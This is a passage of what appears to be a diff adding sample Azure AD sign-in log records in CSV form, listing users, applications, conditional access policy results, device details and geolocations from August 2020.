'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8d371308-4e1f-476f-97d6-c0eae02e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,8d371308-4e1f-476f-97d6-c0eae02e1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1725,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:55.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8954143-cd0b-489c-9a96-50c220b9b027,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",134c741e-1983-4152-9e8f-71886f6e1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,134c741e-1983-4152-9e8f-71886f6e1300,SigninLogs,Sucess,41.90428925,-85.99833679
+1726,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:06.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:22,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",fd7d50db-5207-4a08-83a9-795881934700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fd7d50db-5207-4a08-83a9-795881934700,SigninLogs,Sucess,40.75891113,-73.97901917
+1727,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b8d6a3ee-0f7e-4414-876f-a9c04647dc69,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",cbc0f99c-7bef-40f5-9b26-c77dbfbf1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,cbc0f99c-7bef-40f5-9b26-c77dbfbf1800,SigninLogs,Sucess,41.90428925,-85.99833679
+1728,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:07.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0eae10e0200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8d371308-4e1f-476f-97d6-c0eae10e0200,SigninLogs,Sucess,33.0175209,35.44601059
+1729,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:58.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a77e43f3-4791-4633-b109-e546ada5db8f,Microsoft.aadiam,Microsoft.aadiam,,Hagar Romach,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bcc08e0000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.12094116210936, 'latitude': 47.68050003051758}, 'state': 'Washington', 'city': 'Redmond'}",none,none,none,none,[],{'errorCode': 0},Hagar Romach,110d36ce-95b9-4ce4-a5cd-f79bbe4bbd9f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,87802367-3de7-42c2-ada0-d6bcc08e0000,SigninLogs,Sucess,47.68050003,-122.1209412
+1730,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:05.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",d774c493-40b1-4743-b785-3f4a6ce10000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d774c493-40b1-4743-b785-3f4a6ce10000,SigninLogs,Sucess,33.0175209,35.44601059
+1731,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:07.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0eae10e0200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8d371308-4e1f-476f-97d6-c0eae10e0200,SigninLogs,Sucess,33.0175209,35.44601059
+1732,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:09.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 